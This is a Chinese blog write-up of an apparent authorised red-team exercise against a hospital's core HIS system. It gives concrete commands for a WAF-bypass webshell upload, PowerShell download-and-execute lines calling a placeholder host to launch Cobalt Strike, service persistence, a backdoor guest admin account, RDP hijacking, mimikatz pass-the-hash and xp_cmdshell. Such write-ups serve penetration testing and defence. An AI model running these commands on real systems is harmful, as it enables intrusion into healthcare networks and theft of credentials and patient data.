记一次实战攻防渗透

前言

记录之前参加演练的一次实战过程。

演练目标

拿下某医院核心his权限

web打点

拿到目标,通过信息收集尽可能多的寻找目标资产,最终发现了存在漏洞的某系统,通过该系统进入内网。

用户枚举漏洞

登录处存在用户枚举漏洞


返回包可以看到该帐号的功能,所属的科室等信息。


弱口令漏洞

通过对枚举得到的用户进行弱口令爆破,成功登陆了某医生的账户。



该账户只有一个体检预约管理的功能,经过测试无法直接getshell。

越权漏洞

观察当前url地址,发现存在usersysid和deptid两个参数,usersysid为当前用户名,deptid恰好可以通过用户枚举得到,因此可能存在越权漏洞。



经过测试发现可以通过修改参数进行越权,大部分为普通用户,经过反复尝试发现269用户权限比较高,尝试替换usersysid和deptid进行越权。



成功访问到该帐号的功能模块。

文件上传漏洞

对高权限用户的功能模块进行测试,发现上传点。



网站存在某种waf,常规webshell无法直接上传,尝试进行bypass。

最终绕过waf成功上传webshell,对数据包进行了4次处理。
1、"boundary="后面加tab键
2、使用asHX后缀
3、删除"Content-type:"后面的类型信息
4、正常图片文件的内容开头



成功得到目标webshell,web打点结束。


内网横向

上线cs

目前只有一个webshell命令执行权限,为了后续横向,尝试利用cs进行多人运动~
首先查看目标主机是否出网,和安装的杀软情况。
通过ping命令确定目标出网。


通过tasklist命令查看是否运行杀软
https://maikefee.com/av_list
未发现存在杀软

系统版本为server2012,尝试直接运行powershell命令上线cs。

powershell.exe IEX ((new-object net.webclient).downloadstring('http:x.x.x.x:xx/x'))

cs成功上线,当前为iis权限,直接使用梼杌的提权插件。选择使用烂土豆提权server2012
https://github.com/pandasec888/taowu-cobalt-strike

成功提升至system权限。


权限维持

目前已经得到了system权限,为了防止webshell被删,服务器重启,web服务关闭等问题,需要做一下权限维持。
https://www.jianshu.com/p/f3f3d4d34701
我常用的把powershell上线cs的命令注册成服务,每次开机执行。(容易被发现,追求隐蔽性不推荐该方法)

创建一个名为主动防御的服务。
sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http://x.x.x.x/a')"
设置为自动运行
sc config "主动防御" start= auto
演练结束删除服务。
sc delete "主动防御"

激活guest用户

net user guest   /active:yes
net user guest   Qax@123
net localgroup   administrators  guest   /add

搭建隧道

可以选择 nps和frp
我使用是nps代理
优点: 稳定,速度快,管理方便
缺点:扫描内网主机端口全部开放(不知道是不是我nps版本的问题)
创建客户端



上传服务端到目标服务器执行

npc.exe -server=x.x.x.x:xxx -vkey=xxxxxx -type=tcp

使用Proxifier代入内网。


RDP登陆

有时候我们需要登陆管理员用户方便进行信息收集。
目标为server2012 mimikatz默认无法读取明文密码,因此在ntml hash解不开的情况下,我们可以尝试2种方法进行登陆。
1、RDP劫持
登陆激活的guest用户,执行命令,劫持administrator

query user 
sc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"      #1为目标会话id和当前会话名 
net start tide

2、pth登录远程rdp
对于server 2012系统,直接使用mimikatz传递ntlm hash值登录

privilege::debug
sekurlsa::pth /user:administrator /domain:127.0.0.1 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"

win10系统报错



需要修改注册表

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

重新登录

privilege::debug
sekurlsa::pth /user:administrator /domain:127.0.0.1 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"

!!!登陆前使用命令查看管理员是否在线。

query user

这里选择使用RDP劫持的方式登陆了administrator用户。


内网信息收集

具体信息收集的过程不再描述,通过内网信息收集,发现了数据库连接配置文件,包含his,lis等核心数据库。



解密his数据库连接信息,发现目标为sql server数据库。



数据库服务器和当前跳板机为2个不同b段。

获取核心his权限

利用得到的账户密码直接登陆his数据库。
尝试使用xp_cmdshell执行系统命令。

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell "whoami"

成功拿到his数据库服务器权限。



目标不出网,且无法ping通跳板机。



证实了该服务器为his服务器,且该网段为核心内网。至此达到演练目标。

扩展

目前只能通过数据库来执行系统命令,尝试上线到cs上。
该his服务器不通外网,且不通跳板机所在的网段。
反向连接失效,尝试使用正向连接,上线目标服务器到cs。


cs新建一个监听器,选择beacon-tcp,执行后本地开放一个端口



生成一个无状态的可执行木马文件,选择对应的监听器。



上传木马文件到目标主机~
这里遇到了困难,目标不出网,且不通当前跳板机,只有cmd命令行的情况下,无法直接上传。
解决方法:目标开放了iis服务,向iis服务网站目录下 echo一个apsx一句话木马,然后通过webshell上传可执行exe文件。

利用SQL TOOLS可以直观的寻找目标网站目标,然后echo写入木马。




使用webshell上传exe并且执行。
执行后会本地开放一个8877端口。
在跳板机的cs会话中执行:
connect x.x.x.x 8877

去正向连接目标开放的8877端口。



成功通过多层内网上线了目标主机。


总结

不算复杂的一次内网实战过程,知识又增加了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,718评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,683评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,207评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,755评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,862评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,050评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,136评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,882评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,330评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,651评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,789评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,477评论 4 333
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,135评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,864评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,099评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,598评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,697评论 2 351

推荐阅读更多精彩内容